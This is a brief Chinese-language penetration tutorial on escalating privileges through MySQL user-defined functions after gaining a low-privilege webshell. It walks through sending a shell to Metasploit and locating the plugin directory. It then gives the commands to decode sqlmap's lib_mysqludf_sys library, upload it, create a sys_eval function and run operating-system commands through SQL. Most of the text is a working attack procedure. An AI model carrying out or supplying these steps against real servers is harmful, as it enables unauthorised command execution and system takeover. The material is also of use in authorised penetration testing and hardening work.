如果我们拿到的webshell权限较低，但是如果mysql是以高权限运行的，我们可以用mysql udf提权。

拿到webshell后先弹个shell到msf

拿到phpmyadmin的路径

查一下插件路径

对于udf文件，在sqlmap工具中自带就有，只要找对应操作系统的版本即可

我们要对udf文件进行解码

cd /usr/share/sqlmap/extra/cloak/ 
python cloak.py -d -i /usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_

其中，lib_mysqludf_sys.so_是原文件，lib_mysqludf_sys.so是解码后的文件

把lib_mysqludf_sys.so传到插件目录

利用第上传的lib_mysqludf_sys.so文件，创建一个MySQL函数sys_eval

create function sys_eval returns string soname "lib_mysqludf_sys.so"

执行系统命令

select sys_eval('whoami')

udf linux.rar